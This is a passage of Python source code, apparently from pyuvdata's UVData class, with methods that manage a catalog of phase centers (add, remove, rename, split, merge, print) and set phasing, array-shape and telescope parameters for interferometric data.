if (cat_frame is None) and (cat_type in ["sidereal", "ephem"]):
raise ValueError("cat_frame cannot be None for sidereal phase centers.")
elif (cat_frame != "altaz") and (cat_type in ["driftscan", "unphased"]):
raise ValueError(
"cat_frame must be either None or 'altaz' when the cat type "
"is either driftscan or unphased."
)
if (cat_type == "unphased") and (cat_lon != 0.0):
raise ValueError(
"Catalog entries that are unphased must have cat_lon set to either "
"0 or None."
)
if (cat_type == "unphased") and (cat_lat != (np.pi / 2)):
raise ValueError(
"Catalog entries that are unphased must have cat_lat set to either "
"pi/2 or None."
)
if (cat_type != "sidereal") and (
(cat_pm_ra is not None) or (cat_pm_dec is not None)
):
raise ValueError(
"Non-zero proper motion values (cat_pm_ra, cat_pm_dec) "
"for cat types other than sidereal are not supported."
)
if isinstance(cat_epoch, Time) or isinstance(cat_epoch, str):
if cat_frame in ["fk4", "fk4noeterms"]:
cat_epoch = Time(cat_epoch).byear
else:
cat_epoch = Time(cat_epoch).jyear
elif cat_epoch is not None:
cat_epoch = float(cat_epoch)
if cat_type == "ephem":
cat_times = np.array(cat_times, dtype=float).reshape(-1)
cshape = cat_times.shape
try:
cat_lon = np.array(cat_lon, dtype=float).reshape(cshape)
cat_lat = np.array(cat_lat, dtype=float).reshape(cshape)
if cat_dist is not None:
cat_dist = np.array(cat_dist, dtype=float).reshape(cshape)
if cat_vrad is not None:
cat_vrad = np.array(cat_vrad, dtype=float).reshape(cshape)
except ValueError:
raise ValueError(
"Object properties -- lon, lat, pm_ra, pm_dec, dist, vrad -- must "
"be of the same size as cat_times for ephem phase centers."
)
else:
cat_lon = None if cat_lon is None else float(cat_lon)
cat_lat = None if cat_lat is None else float(cat_lat)
cat_pm_ra = None if cat_pm_ra is None else float(cat_pm_ra)
cat_pm_dec = None if cat_pm_dec is None else float(cat_pm_dec)
cat_dist = None if cat_dist is None else float(cat_dist)
cat_vrad = None if cat_vrad is None else float(cat_vrad)
# Names serve as dict keys, so we need to make sure that they're unique
if not force_update:
temp_id, cat_diffs = self._look_in_catalog(
cat_name,
cat_type=cat_type,
cat_lon=cat_lon,
cat_lat=cat_lat,
cat_frame=cat_frame,
cat_epoch=cat_epoch,
cat_times=cat_times,
cat_pm_ra=cat_pm_ra,
cat_pm_dec=cat_pm_dec,
cat_dist=cat_dist,
cat_vrad=cat_vrad,
)
# If the source does have the same name, check to see if all the
            # attributes match. If so, no problem, go about your business
if temp_id is not None:
if cat_diffs == 0:
# Everything matches, return the catalog ID of the matching entry
return temp_id
else:
raise ValueError(
"Cannot add different source with an non-unique name."
)
# We want to create a unique ID for each source, for use in indexing arrays.
# The logic below ensures that we pick the lowest positive integer that is
# not currently being used by another source
used_cat_ids = {
self.phase_center_catalog[name]["cat_id"]: name
for name in self.phase_center_catalog.keys()
}
if force_update and (cat_name in self.phase_center_catalog.keys()):
cat_id = self.phase_center_catalog[cat_name]["cat_id"]
elif cat_id is None:
cat_id = int(
np.arange(self.Nphase + 1)[
~np.isin(np.arange(self.Nphase + 1), list(used_cat_ids.keys()))
][0]
)
elif cat_id in used_cat_ids.keys():
raise ValueError(
"Provided cat_id belongs to another source (%s)." % used_cat_ids[cat_id]
)
# If source is unique, begin creating a dictionary for it
phase_dict = {
"cat_id": cat_id,
"cat_type": cat_type,
"cat_lon": cat_lon,
"cat_lat": cat_lat,
"cat_frame": cat_frame,
"cat_epoch": cat_epoch,
"cat_times": cat_times,
"cat_pm_ra": cat_pm_ra,
"cat_pm_dec": cat_pm_dec,
"cat_vrad": cat_vrad,
"cat_dist": cat_dist,
"info_source": info_source,
}
self.phase_center_catalog[cat_name] = phase_dict
self.Nphase = len(self.phase_center_catalog.keys())
return cat_id
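    # Usage sketch (hypothetical name and coordinates, in radians); this helper is
    # normally invoked by the phasing/file-reading routines rather than by users:
    #   cat_id = uvd._add_phase_center(
    #       "my_source", cat_type="sidereal",
    #       cat_lon=2.0, cat_lat=0.5, cat_frame="icrs",
    #   )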
def _remove_phase_center(self, defunct_name):
"""
Remove an entry from the internal object/source catalog.
Removes an entry from the attribute `phase_center_catalog`. Only allowed when
the UVData object in question is a multi phase center data set (i.e.,
`multi_phase_center=True`).
Parameters
----------
defunct_name : str
Name of the source to be removed
Raises
------
ValueError
If multi_phase_center is not set to True
IndexError
If the name provided is not found as a key in `phase_center_catalog`
"""
if not self.multi_phase_center:
raise ValueError(
"Cannot remove a phase center if multi_phase_center != True."
)
if defunct_name not in self.phase_center_catalog.keys():
raise IndexError("No source by that name contained in the catalog.")
del self.phase_center_catalog[defunct_name]
self.Nphase = len(self.phase_center_catalog.keys())
def _clear_unused_phase_centers(self):
"""
        Remove object dictionaries and names that are no longer in use.
        Goes through the `phase_center_catalog` attribute of a UVData object and
clears out entries that are no longer being used, and appropriately updates
`phase_center_id_array` accordingly. This function is not typically called
by users, but instead is used by other methods.
Raises
------
ValueError
If attempting to call the method when multi_phase_center=False.
"""
if not self.multi_phase_center:
raise ValueError(
"Cannot remove a phase center if multi_phase_center != True."
)
unique_cat_ids = np.unique(self.phase_center_id_array)
defunct_list = []
Nphase = 0
for cat_name in self.phase_center_catalog.keys():
cat_id = self.phase_center_catalog[cat_name]["cat_id"]
if cat_id in unique_cat_ids:
Nphase += 1
else:
defunct_list.append(cat_name)
# Check the number of "good" sources we have -- if we haven't dropped any,
# then we are free to bail, otherwise update the Nphase attribute
if Nphase == self.Nphase:
return
# Time to kill the entries that are no longer in the source stack
for defunct_name in defunct_list:
self._remove_phase_center(defunct_name)
def _check_for_unphased(self):
"""
Check which Nblts are unphased in a multi phase center dataset.
        This convenience method returns a boolean mask to identify which data
along the Blt axis contains unphased objects (which is only applicable when
multi_phase_center=True)
Returns
-------
blt_mask : ndarray of bool
A boolean mask for identifying which elements contain unphased objects
"""
if self.multi_phase_center:
# Check and see if we have any unphased objects, in which case
# their w-values should be zeroed out.
nophase_dict = {
self.phase_center_catalog[name]["cat_id"]: self.phase_center_catalog[
name
]["cat_type"]
== "unphased"
for name in self.phase_center_catalog.keys()
}
# Use dict to construct a bool array
blt_mask = np.array(
[nophase_dict[idx] for idx in self.phase_center_id_array], dtype=bool
)
else:
# If not multi phase center, we just need to check the phase type
blt_mask = np.repeat(self.phase_type == "drift", self.Nblts)
return blt_mask
def rename_phase_center(self, old_name, new_name):
"""
Rename a phase center/catalog entry within a multi phase center data set.
Parameters
----------
old_name : str
Phase center name for the data to be renamed.
new_name : str
New name for the phase center.
Raises
------
ValueError
If attempting to run the method on a non multi phase center data set, if
`old_name` is not found as a key in `phase_center_catalog`, if `new_name`
already exists as a key in `phase_center_catalog`, or if attempting to
name a source "unphased" (which is reserved).
TypeError
If `new_name` is not actually a string.
"""
if not self.multi_phase_center:
raise ValueError(
"Cannot rename a phase center if multi_phase_center != True."
)
if old_name not in self.phase_center_catalog.keys():
raise ValueError("No entry by the name %s in the catalog." % old_name)
if not isinstance(new_name, str):
raise TypeError("Value provided to new_name must be a string.")
if new_name == old_name:
# This is basically just a no-op, so return to user
return
if new_name in self.phase_center_catalog.keys():
raise ValueError(
"Must include a unique name for new_name, %s is already present "
"in phase_center_catalog." % new_name
)
if (new_name == "unphased") and (
self.phase_center_catalog[old_name]["cat_type"] != "unphased"
):
raise ValueError(
"The name unphased is reserved. Please choose another value for "
"new_name."
)
self.phase_center_catalog[new_name] = self.phase_center_catalog[old_name]
self.Nphase = len(self.phase_center_catalog.keys())
self._remove_phase_center(old_name)
def split_phase_center(self, cat_name, new_name, select_mask, downselect=False):
"""
Rename the phase center (but preserve other properties) of a subset of data.
Allows you to rename a subset of the data phased to a particular phase center,
marked by a different name than the original. Useful when you want to phase to
one position, but want to differentiate different groups of data (e.g., marking
every other integration to make jackknifing easier).
Parameters
----------
cat_name : str
Name of the phase center to be split.
new_name : str
New name for the object.
select_mask : array_like
Selection mask for which data should be identified as belonging to the phase
center labeled by `new_name`. Any array-like able to be used as an index
is suitable -- the most typical is an array of bool with length `Nblts`,
or an array of ints within the range (-Nblts, Nblts).
downselect : bool
If selecting data that is not marked as belonging to `cat_name`,
normally an error is thrown. By setting this to True, `select_mask` will
be modified to exclude data not marked as belonging to `cat_name`.
Raises
------
ValueError
If attempting to run the method on a non multi phase center data set, if
`old_name` is not found as a key in `phase_center_catalog`, if `new_name`
already exists as a key in `phase_center_catalog`, or if attempting to
name a source "unphased" (which is reserved). Also raised if `select_mask`
contains data that doesn't belong to `cat_name`, unless setting
`downselect` to True.
IndexError
If select_mask is not a valid indexing array.
UserWarning
If all data for `cat_name` was selected (in which case `rename_phase_center`
is called instead), or if no valid data was selected.
"""
        # Check to make sure that everything lines up before making any changes
if not self.multi_phase_center:
raise ValueError(
"Cannot use split_phase_center on a non-multi phase center data set."
)
if not isinstance(new_name, str):
raise TypeError("Value provided to new_name must be a string.")
if cat_name not in self.phase_center_catalog.keys():
raise ValueError("No entry by the name %s in the catalog." % cat_name)
if new_name in self.phase_center_catalog.keys():
raise ValueError(
"The name %s is already found in the catalog, choose another name "
"for new_name." % new_name
)
if (new_name == "unphased") and (
self.phase_center_catalog[cat_name]["cat_type"] != "unphased"
):
raise ValueError(
"The name unphased is reserved. Please choose another value for "
"new_name."
)
try:
inv_mask = np.ones(self.Nblts, dtype=bool)
inv_mask[select_mask] = False
except IndexError:
raise IndexError(
"select_mask must be an array-like, either of ints with shape (Nblts), "
"or of ints within the range (-Nblts, Nblts)."
)
        # Now that we know that all the inputs are sensible, let's make sure that
# the select_mask choice is sensible
cat_id = self.phase_center_catalog[cat_name]["cat_id"]
# If we have selected any entries that don't correspond to the cat_id
# in question, either downselect or raise an error.
if np.any(cat_id != self.phase_center_id_array[select_mask]):
if downselect:
select_mask = np.logical_and(
~inv_mask, cat_id == self.phase_center_id_array
)
inv_mask = ~select_mask
else:
raise ValueError(
"Data selected with select_mask includes that which has not been "
"phased to %s. You can fix this by either revising select_mask or "
"setting downselect=True." % cat_name
)
# Now check for no(-ish) ops
if np.all(inv_mask):
# You didn't actually select anything we could change
warnings.warn(
"No relevant data selected - %s not added to the data set" % new_name
)
elif not np.any(cat_id == self.phase_center_id_array[inv_mask]):
# No matching catalog IDs found outside the range, so this is really a
# replace more than a split.
warnings.warn(
"All data for %s selected - using rename_phase_center instead of a "
"split_phase_center." % cat_name
)
self.rename_phase_center(cat_name, new_name)
else:
temp_dict = self.phase_center_catalog[cat_name]
cat_id = self._add_phase_center(
new_name,
temp_dict["cat_type"],
cat_lon=temp_dict.get("cat_lon"),
cat_lat=temp_dict.get("cat_lat"),
cat_frame=temp_dict.get("cat_frame"),
cat_epoch=temp_dict.get("cat_epoch"),
cat_times=temp_dict.get("cat_times"),
cat_pm_ra=temp_dict.get("cat_pm_ra"),
cat_pm_dec=temp_dict.get("cat_pm_dec"),
cat_dist=temp_dict.get("cat_dist"),
cat_vrad=temp_dict.get("cat_vrad"),
)
self.phase_center_id_array[select_mask] = cat_id
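    # Usage sketch (hypothetical names): marking every other integration of a target
    # to simplify jackknifing, using only attributes defined on this object:
    #   odd_mask = np.isin(uvd.time_array, np.unique(uvd.time_array)[1::2])
    #   uvd.split_phase_center("targetA", "targetA_odd", odd_mask, downselect=True)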
def merge_phase_centers(self, catname1, catname2, force_merge=False):
"""
        Merge two differently named objects into one within a multi-phase-ctr data set.
Recombines two different objects into a single catalog entry -- useful if
having previously used `split_phase_center` or when multiple objects with
different names share the same source parameters.
Parameters
----------
catname1 : str
String containing the name of the first phase center. Note that this name
will be preserved in the UVData object.
catname2 : str
String containing the name of the second phase center, which will be merged
into the first phase center. Note that once the merge is complete, all
information about this phase center is removed.
force_merge : bool
Normally, the method will throw an error if the phase center properties
            differ for `catname1` and `catname2`. This can be overridden by setting this
to True. Default is False.
Raises
------
ValueError
            If catname1 or catname2 are not found in the UVData object, or if their
properties differ (and `force_merge` is not set to True).
UserWarning
If forcing the merge of two objects with different properties.
"""
if not self.multi_phase_center:
raise ValueError(
"Cannot use merge_phase_centers on a non-multi phase center data set."
)
if catname1 not in self.phase_center_catalog.keys():
raise ValueError("No entry by the name %s in the catalog." % catname1)
if catname2 not in self.phase_center_catalog.keys():
raise ValueError("No entry by the name %s in the catalog." % catname2)
temp_dict = self.phase_center_catalog[catname2]
# First, let's check and see if the dict entries are identical
cat_id, cat_diffs = self._look_in_catalog(
catname1,
cat_type=temp_dict["cat_type"],
cat_lon=temp_dict.get("cat_lon"),
cat_lat=temp_dict.get("cat_lat"),
cat_frame=temp_dict.get("cat_frame"),
cat_epoch=temp_dict.get("cat_epoch"),
cat_times=None,
cat_pm_ra=None,
cat_pm_dec=None,
cat_dist=None,
cat_vrad=None,
)
if cat_diffs != 0:
if force_merge:
warnings.warn(
"Forcing %s and %s together, even though their attributes "
"differ" % (catname1, catname2)
)
else:
raise ValueError(
"Attributes of %s and %s differ in phase_center_catalog, which "
"means that they are likely not referring to the same position in "
"the sky. You can ignore this error and force merge_phase_centers "
"to complete by setting force_merge=True, but this should be done "
"with substantial caution." % (catname1, catname2)
)
old_cat_id = self.phase_center_catalog[catname2]["cat_id"]
self.phase_center_id_array[self.phase_center_id_array == old_cat_id] = cat_id
self._remove_phase_center(catname2)
def print_phase_center_info(
self, cat_name=None, hms_format=None, return_str=False, print_table=True
):
"""
        Print out the details of objects in a multi-phase-center data set.
Prints out an ASCII table that contains the details of the
`phase_center_catalog` attribute, which acts as the internal source catalog
for UVData objects.
Parameters
----------
cat_name : str
Optional parameter which, if provided, will cause the method to only return
information on the phase center with the matching name. Default is to print
out information on all catalog entries.
hms_format : bool
Optional parameter, which if selected, can be used to force coordinates to
be printed out in Hours-Min-Sec (if set to True) or Deg-Min-Sec (if set to
False) format. Default is to print out in HMS if all the objects have
            coordinate frames of icrs, gcrs, fk5, fk4, and topo; otherwise, DMS format
is used.
        return_str : bool
            If set to True, the method returns an ASCII string which contains all the
            table information. Default is False.
print_table : bool
If set to True, prints the table to the terminal window. Default is True.
Returns
-------
        table_str : str
            If return_str=True, an ASCII string containing the entire table text.
Raises
------
ValueError
If `cat_name` matches no keys in `phase_center_catalog`.
"""
r2d = 180.0 / np.pi
r2m = 60.0 * 180.0 / np.pi
r2s = 3600.0 * 180.0 / np.pi
ra_frames = ["icrs", "gcrs", "fk5", "fk4", "topo"]
if not self.multi_phase_center:
raise ValueError(
"Cannot use print_phase_center_info on a "
"non-multi phase center data set."
)
if cat_name is None:
name_list = list(self.phase_center_catalog.keys())
dict_list = [self.phase_center_catalog[name] for name in name_list]
elif cat_name in self.phase_center_catalog.keys():
name_list = [cat_name]
dict_list = [self.phase_center_catalog[cat_name]]
else:
raise ValueError("No entry by the name %s in the catalog." % cat_name)
# We want to check and actually see which fields we need to
# print
any_lon = any_lat = any_frame = any_epoch = any_times = False
any_pm_ra = any_pm_dec = any_dist = any_vrad = False
cat_id_list = []
for indv_dict in dict_list:
cat_id_list.append(indv_dict["cat_id"])
any_lon = any_lon or indv_dict.get("cat_lon") is not None
any_lat = any_lat or indv_dict.get("cat_lat") is not None
any_frame = any_frame or indv_dict.get("cat_frame") is not None
any_epoch = any_epoch or indv_dict.get("cat_epoch") is not None
any_times = any_times or indv_dict.get("cat_times") is not None
any_pm_ra = any_pm_ra or indv_dict.get("cat_pm_ra") is not None
any_pm_dec = any_pm_dec or indv_dict.get("cat_pm_dec") is not None
any_dist = any_dist or indv_dict.get("cat_dist") is not None
any_vrad = any_vrad or indv_dict.get("cat_vrad") is not None
if any_lon and (hms_format is None):
cat_frame = indv_dict.get("cat_frame")
cat_type = indv_dict["cat_type"]
if (cat_frame not in ra_frames) or (cat_type == "driftscan"):
hms_format = False
if hms_format is None:
hms_format = True
col_list = []
col_list.append(
{"hdr": ("ID", "#"), "fmt": "% 4i", "field": " %4s ", "name": "cat_id"}
)
col_list.append(
{
"hdr": ("Cat Entry", "Name"),
"fmt": "%12s",
"field": " %12s ",
"name": "cat_name",
}
)
col_list.append(
{"hdr": ("Type", ""), "fmt": "%9s", "field": " %9s ", "name": "cat_type"}
)
if any_lon:
col_list.append(
{
"hdr": ("Az/Lon/RA", "hours" if hms_format else "deg"),
"fmt": "% 3i:%02i:%05.2f",
"field": (" %12s " if hms_format else " %13s "),
"name": "cat_lon",
}
)
if any_lat:
col_list.append(
{
"hdr": ("El/Lat/Dec", "deg"),
"fmt": "%1s%2i:%02i:%05.2f",
"field": " %12s ",
"name": "cat_lat",
}
)
if any_frame:
col_list.append(
{
"hdr": ("Frame", ""),
"fmt": "%5s",
"field": " %5s ",
"name": "cat_frame",
}
)
if any_epoch:
col_list.append(
{
"hdr": ("Epoch", ""),
"fmt": "%7s",
"field": " %7s ",
"name": "cat_epoch",
}
)
if any_times:
col_list.append(
{
"hdr": (" Ephem Range ", "Start-MJD End-MJD"),
"fmt": " %8.2f % 8.2f",
"field": " %20s ",
"name": "cat_times",
}
)
if any_pm_ra:
col_list.append(
{
"hdr": ("PM-Ra", "mas/yr"),
"fmt": "%.4g",
"field": " %6s ",
"name": "cat_pm_ra",
}
)
if any_pm_dec:
col_list.append(
{
"hdr": ("PM-Dec", "mas/yr"),
"fmt": "%.4g",
"field": " %6s ",
"name": "cat_pm_dec",
}
)
if any_dist:
col_list.append(
{
"hdr": ("Dist", "pc"),
"fmt": "%.1e",
"field": " %7s ",
"name": "cat_dist",
}
)
if any_vrad:
col_list.append(
{
"hdr": ("V_rad", "km/s"),
"fmt": "%.4g",
"field": " %6s ",
"name": "cat_vrad",
}
)
top_str = ""
bot_str = ""
for col in col_list:
top_str += col["field"] % col["hdr"][0]
bot_str += col["field"] % col["hdr"][1]
info_str = ""
info_str += top_str + "\n"
info_str += bot_str + "\n"
info_str += ("-" * len(bot_str)) + "\n"
# We want to print in the order of cat_id
for idx in np.argsort(cat_id_list):
tbl_str = ""
for col in col_list:
# If we have a "special" field that needs extra handling,
# take care of that up front
if col["name"] == "cat_name":
temp_val = name_list[idx]
else:
temp_val = dict_list[idx][col["name"]]
if temp_val is None:
temp_str = ""
elif col["name"] == "cat_lon":
temp_val = np.median(temp_val)
temp_val /= 15.0 if hms_format else 1.0
coord_tuple = (
np.mod(temp_val * r2d, 360.0),
np.mod(temp_val * r2m, 60.0),
np.mod(temp_val * r2s, 60.0),
)
temp_str = col["fmt"] % coord_tuple
elif col["name"] == "cat_lat":
temp_val = np.median(temp_val)
coord_tuple = (
"-" if temp_val < 0.0 else "+",
np.mod(np.abs(temp_val) * r2d, 360.0),
np.mod(np.abs(temp_val) * r2m, 60.0),
np.mod(np.abs(temp_val) * r2s, 60.0),
)
temp_str = col["fmt"] % coord_tuple
elif col["name"] == "cat_epoch":
use_byrs = dict_list[idx]["cat_frame"] in ["fk4", "fk4noeterms"]
temp_val = ("B%6.1f" if use_byrs else "J%6.1f") % temp_val
temp_str = col["fmt"] % temp_val
elif col["name"] == "cat_times":
time_tuple = (
np.min(temp_val) - 2400000.5,
np.max(temp_val) - 2400000.5,
)
temp_str = col["fmt"] % time_tuple
elif (col["name"] == "cat_dist") or (col["name"] == "cat_vrad"):
temp_val = np.median(temp_val)
temp_str = col["fmt"] % temp_val
else:
temp_str = col["fmt"] % temp_val
tbl_str += col["field"] % temp_str
info_str += tbl_str + "\n"
if print_table:
# We need this extra bit of code to handle trailing whitespace, since
# otherwise some checks (e.g., doc check on tutorials) will balk
print(
"\n".join([line.rstrip() for line in info_str.split("\n")]), end=""
) # pragma: nocover
if return_str:
return info_str
def _update_phase_center_id(self, cat_name, new_cat_id=None, reserved_ids=None):
"""
Update a phase center with a new catalog ID number.
Parameters
----------
cat_name : str
Name of the phase center, which corresponds to a key in the attribute
`phase_center_catalog`.
new_cat_id : int
Optional argument. If supplied, then the method will attempt to use the
provided value as the new catalog ID, provided that an existing catalog
entry is not already using the same value. If not supplied, then the
method will automatically assign a value.
        reserved_ids : array-like of int
Optional argument. An array-like of ints that denotes which ID numbers
are already reserved. Useful for when combining two separate catalogs.
Raises
------
ValueError
            If not using the method on a multi-phase-center data set, if there's no entry
            that matches `cat_name`, or if the value `new_cat_id` is already taken.
"""
if not self.multi_phase_center:
raise ValueError(
"Cannot use _update_phase_center_id on a "
"non-multi phase center data set."
)
if cat_name not in self.phase_center_catalog.keys():
raise ValueError(
"Cannot run _update_phase_center_id: no entry with name %s." % cat_name
)
old_cat_id = self.phase_center_catalog[cat_name]["cat_id"]
used_cat_ids = [] if (reserved_ids is None) else reserved_ids.copy()
for name in self.phase_center_catalog.keys():
if name != cat_name:
used_cat_ids.append(self.phase_center_catalog[name]["cat_id"])
if new_cat_id is None:
# If the old ID is in the reserved list, then we'll need to update it
if old_cat_id not in used_cat_ids:
# Don't need to actually update anything
return
else:
new_cat_id = np.arange(len(used_cat_ids) + 1)[
~np.isin(np.arange(len(used_cat_ids) + 1), used_cat_ids)
][0]
else:
if new_cat_id in used_cat_ids:
raise ValueError("Catalog ID supplied already taken by another source.")
self.phase_center_id_array[
self.phase_center_id_array == old_cat_id
] = new_cat_id
self.phase_center_catalog[cat_name]["cat_id"] = new_cat_id
def _set_multi_phase_center(self, preserve_phase_center_info=False):
"""
        Set multi_phase_center to True, and adjust required parameters.
        This method is typically not called directly by users; instead it is called
        by the file-reading methods to indicate that an object has multiple phase
        centers within the same data set.
Parameters
----------
preserve_phase_center_info : bool
Preserve the source information located in `object_name`, and for phased
data sets, also `phase_center_ra`, `phase_center_dec`, `phase_center_epoch`
and `phase_center_frame`. Default is False. Note that setting this to
False will mean that some required attributes will NOT be correctly set,
e.g., `phase_center_id_array` -- these will need to be set after calling
            this method in order for the UVData object to be viable.
"""
# If you have already set this, don't do anything
if self.multi_phase_center:
return
# All multi phase center objects have phase_type="phased", even if they are
# unphased.
if self.phase_type == "phased":
cat_type = "sidereal"
else:
self._set_phased()
cat_type = "unphased"
self.multi_phase_center = True
# Mark once-option arrays as now required
self._phase_center_id_array.required = True
self._Nphase.required = True
self._phase_center_catalog.required = True
# This should technically be required for any phased data set, but for now,
        # we are only going to make it mandatory for multi-phase-center data sets.
self._phase_center_app_ra.required = True
self._phase_center_app_dec.required = True
self._phase_center_frame_pa.required = True
self.Nphase = 0
self.phase_center_catalog = {}
cat_name = self.object_name
self.object_name = "multi"
if preserve_phase_center_info:
cat_id = self._add_phase_center(
cat_name,
cat_type=cat_type,
cat_lon=self.phase_center_ra,
cat_lat=self.phase_center_dec,
cat_frame=self.phase_center_frame,
cat_epoch=self.phase_center_epoch,
)
self.phase_center_id_array = np.zeros(self.Nblts, dtype=int) + cat_id
self.phase_center_ra = 0.0
self.phase_center_dec = 0.0
if self.phase_center_frame is None:
self.phase_center_frame = "icrs"
if self.phase_center_epoch is None:
self.phase_center_epoch = 2000.0
if (cat_type == "unphased") and preserve_phase_center_info:
# If moving from unphased, then we'll fill in app_ra and app_dec in
# the way that we normally would if this were an "unphased" object.
self._set_app_coords_helper()
def _set_drift(self):
"""
Set phase_type to 'drift' and adjust required parameters.
This method should not be called directly by users; instead it is called
by phasing methods and file-reading methods to indicate the object has a
`phase_type` of "drift" and define which metadata are required.
"""
self.phase_type = "drift"
self._phase_center_frame.required = False
self._phase_center_ra.required = False
self._phase_center_dec.required = False
self._phase_center_app_ra.required = False
self._phase_center_app_dec.required = False
self._phase_center_frame_pa.required = False
def _set_phased(self):
"""
Set phase_type to 'phased' and adjust required parameters.
This method should not be called directly by users; instead it is called
by phasing methods and file-reading methods to indicate the object has a
`phase_type` of "phased" and define which metadata are required.
"""
self.phase_type = "phased"
self._phase_center_frame.required = True
self._phase_center_ra.required = True
self._phase_center_dec.required = True
self._phase_center_app_ra.required = True
self._phase_center_app_dec.required = True
self._phase_center_frame_pa.required = True
@property
def _data_params(self):
"""List of strings giving the data-like parameters."""
return ["data_array", "nsample_array", "flag_array"]
@property
def data_like_parameters(self):
"""Iterate defined parameters which are data-like (not metadata-like)."""
for key in self._data_params:
if hasattr(self, key):
yield getattr(self, key)
@property
def metadata_only(self):
"""
Property that determines whether this is a metadata only object.
An object is metadata only if data_array, nsample_array and flag_array
are all None.
"""
metadata_only = all(d is None for d in self.data_like_parameters)
for param_name in self._data_params:
getattr(self, "_" + param_name).required = not metadata_only
return metadata_only
def _set_future_array_shapes(self):
"""
Set future_array_shapes to True and adjust required parameters.
This method should not be called directly by users; instead it is called
by file-reading methods and `use_future_array_shapes` to indicate the
`future_array_shapes` is True and define expected parameter shapes.
"""
self.future_array_shapes = True
self._freq_array.form = ("Nfreqs",)
self._channel_width.form = ("Nfreqs",)
for param_name in self._data_params:
getattr(self, "_" + param_name).form = ("Nblts", "Nfreqs", "Npols")
def use_future_array_shapes(self):
"""
Change the array shapes of this object to match the planned future shapes.
        This method allows users to convert to the planned array shapes before
        the changes go into effect. This method sets the `future_array_shapes`
parameter on this object to True.
"""
self._set_future_array_shapes()
if not self.metadata_only:
# remove the length-1 spw axis for all data-like parameters
for param_name in self._data_params:
setattr(self, param_name, (getattr(self, param_name))[:, 0, :, :])
# remove the length-1 spw axis for the freq_array
self.freq_array = self.freq_array[0, :]
if not self.flex_spw:
# make channel_width be an array of length Nfreqs rather than a single value
# (not needed with flexible spws because this is already done in that case)
self.channel_width = (
np.zeros(self.Nfreqs, dtype=np.float64) + self.channel_width
)
def use_current_array_shapes(self):
"""
        Change the array shapes of this object to match the current array shapes.
        This method allows users to convert back to the current array shapes.
        This method sets the `future_array_shapes` parameter on this object to False.
"""
if not self.flex_spw:
unique_channel_widths = np.unique(self.channel_width)
if unique_channel_widths.size > 1:
raise ValueError(
"channel_width parameter contains multiple unique values, but "
"only one spectral window is present. Cannot collapse "
"channel_width to a single value."
)
self._channel_width.form = ()
self.channel_width = unique_channel_widths[0]
self.future_array_shapes = False
for param_name in self._data_params:
getattr(self, "_" + param_name).form = ("Nblts", 1, "Nfreqs", "Npols")
if not self.metadata_only:
for param_name in self._data_params:
setattr(
self, param_name, (getattr(self, param_name))[:, np.newaxis, :, :]
)
self._freq_array.form = (
1,
"Nfreqs",
)
self.freq_array = self.freq_array[np.newaxis, :]
def known_telescopes(self):
"""
Get a list of telescopes known to pyuvdata.
This is just a shortcut to uvdata.telescopes.known_telescopes()
Returns
-------
list of str
List of names of known telescopes
"""
return uvtel.known_telescopes()
def set_telescope_params(self, overwrite=False):
"""
Set telescope related parameters.
If the telescope_name is in the known_telescopes, set any missing
telescope-associated parameters (e.g. telescope location) to the value
for the known telescope.
Parameters
----------
overwrite : bool
Option to overwrite existing telescope-associated parameters with
the values from the known telescope.
Raises
------
ValueError
if the telescope_name is not in known telescopes
"""
telescope_obj = uvtel.get_telescope(self.telescope_name)
if telescope_obj is not False:
params_set = []
for p in telescope_obj:
telescope_param = getattr(telescope_obj, p)
self_param = getattr(self, p)
if telescope_param.value is not None and (
overwrite is True or self_param.value is None
):
telescope_shape = telescope_param.expected_shape(telescope_obj)
self_shape = self_param.expected_shape(self)
if telescope_shape == self_shape:
params_set.append(self_param.name)
prop_name = self_param.name
setattr(self, prop_name, getattr(telescope_obj, prop_name))
else:
# expected shapes aren't equal. This can happen
# e.g. with diameters,
# which is a single value on the telescope object but is
# an array of length Nants_telescope on the UVData object
# use an assert here because we want an error if this condition
# isn't true, but it's really an internal consistency check.
# This will error if there are changes to the Telescope
# object definition, but nothing that a normal user
# does will cause an error
assert telescope_shape == () and self_shape != "str"
# this parameter is as of this comment most likely a float
# since only diameters and antenna positions will probably
# trigger this else statement
# assign float64 as the type of the array
array_val = (
np.zeros(self_shape, dtype=np.float64,)
+ telescope_param.value
)
params_set.append(self_param.name)
prop_name = self_param.name
setattr(self, prop_name, array_val)
if len(params_set) > 0:
params_set_str = ", ".join(params_set)
warnings.warn(
"{params} is not set. Using known values "
"for {telescope_name}.".format(
params=params_set_str,
telescope_name=telescope_obj.telescope_name,
)
)
else:
raise ValueError(
f"Telescope {self.telescope_name} is not in known_telescopes."
)
def _calc_single_integration_time(self):
"""
Calculate a single integration time in seconds when not otherwise specified.
This function computes the shortest time difference present in the
time_array, and returns it to be used as the integration time for all
samples.
Returns
-------
        int_time : float
integration time in seconds to be assigned to all samples in the data.
"""
# The time_array is in units of days, and integration_time has units of
# seconds, so we need to convert.
return np.diff(np.sort(list(set(self.time_array))))[0] * 86400
def _set_lsts_helper(self):
latitude, longitude, altitude = self.telescope_location_lat_lon_alt_degrees
unique_times, inverse_inds = np.unique(self.time_array, return_inverse=True)
unique_lst_array = uvutils.get_lst_for_time(
unique_times, latitude, longitude, altitude,
)
self.lst_array = unique_lst_array[inverse_inds]
return
def _set_app_coords_helper(self, pa_only=False):
"""
Set values for the apparent coordinate arrays.
This is an internal helper function, which is not designed to be called by
users, but rather individual read/write functions for the UVData object.
Users should use the phase() method for updating/adjusting coordinate values.
Parameters
----------
pa_only : bool, False
Skip the calculation of the apparent RA/Dec, and only calculate the
position angle between `phase_center_frame` and the apparent coordinate
system. Useful for reading in data formats that do not calculate a PA.
"""
if self.phase_type != "phased":
# Uhhh... what do you want me to do? If the dataset isn't phased, there
# isn't an apparent position to calculate. Time to bail, I guess...
return
if pa_only:
app_ra = self.phase_center_app_ra
app_dec = self.phase_center_app_dec
elif self.multi_phase_center:
app_ra = np.zeros(self.Nblts, dtype=float)
app_dec = np.zeros(self.Nblts, dtype=float)
for name in self.phase_center_catalog.keys():
temp_dict = self.phase_center_catalog[name]
select_mask = self.phase_center_id_array == temp_dict["cat_id"]
cat_type = temp_dict["cat_type"]
lon_val = temp_dict.get("cat_lon")
lat_val = temp_dict.get("cat_lat")
epoch = temp_dict.get("cat_epoch")
frame = temp_dict.get("cat_frame")
pm_ra = temp_dict.get("cat_pm_ra")
pm_dec = temp_dict.get("cat_pm_dec")
                vrad = temp_dict.get("cat_vrad")
dist = temp_dict.get("cat_dist")
app_ra[select_mask], app_dec[select_mask] = uvutils.calc_app_coords(
lon_val,
lat_val,
frame,
coord_epoch=epoch,
